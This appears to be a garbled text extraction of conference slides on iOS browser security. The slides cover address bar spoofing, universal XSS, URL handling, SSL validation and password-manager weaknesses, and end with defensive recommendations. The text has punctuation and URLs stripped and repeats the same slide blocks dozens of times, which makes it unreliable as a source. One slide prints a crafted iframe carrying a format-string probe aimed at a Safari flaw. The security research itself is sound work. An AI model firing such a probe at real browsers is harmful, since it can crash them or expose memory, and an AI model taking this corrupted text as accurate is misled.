Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS